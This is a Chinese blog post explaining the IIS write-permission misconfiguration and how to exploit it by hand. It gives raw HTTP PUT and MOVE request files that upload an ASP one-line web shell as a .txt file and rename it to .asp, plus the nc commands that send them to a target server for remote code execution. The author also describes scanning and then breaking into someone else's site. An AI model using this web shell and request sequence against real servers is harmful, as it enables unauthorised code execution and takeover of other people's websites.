IIS写权限漏洞原理&利用工具手动版

本文介绍了IIS写权限漏洞的原理和手工利用方法,包括PUT和MOVE指令来上传和改后缀,以实现远程代码执行。通过手动操作,可以理解漏洞利用过程,并在没有现成工具时自行创建。
摘要由CSDN通过智能技术生成

很老的东西了,严格的说不是漏洞,只是设置不善造成的Bug。八百年遇不到一会,结果前几天不幸碰上了。
用JSKY扫描人家的站,结果扫描器居然直接把人家整站给删了= =#(这也是百年不遇吧....囧,我猜JSKY用的参数一定是“/”)。

还好,最后搞进去把人家的站恢复了,真惊险。还义务帮他补漏洞,删后门......

其中用到了IIS写权限利用工具,桂林老兵版的没带身上,网上下到了zwell版的,结果没成功,最后自己动手写了一个手动版的,看来还是“自己动手,丰衣足食”哇,呼呼。

分别保存下面两个TXT文件。

//PUT.TXT
PUT /zerosoul.txt HTTP/1.1
HOST: www.xxx.com
Content-Length: 24

<%Execute request(’#’)%>

//MOVE.TXT
MOVE /zerosoul.txt HTTP/1.1
HOST: www.xxx.com
Destination: http://www.xxx.com/zerosoul.asp


(别忘了上面有两下回车)
然后在CMD分别输入以下命令即可:

c:/>nc www.xxx.com 80<PUT.TXT
c:/>nc www.xxx.com 80<MOVE.TXT

然后就得到了地址为http://www.xxx.com/zerosoul.asp的一句话。

通过上面文本的内容,我们可以轻易看出IIS写权限是怎么利用的:

1.使用PUT方式上传后缀名为TXT的一句话马(不能直接上传IIS能解析的文件)。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值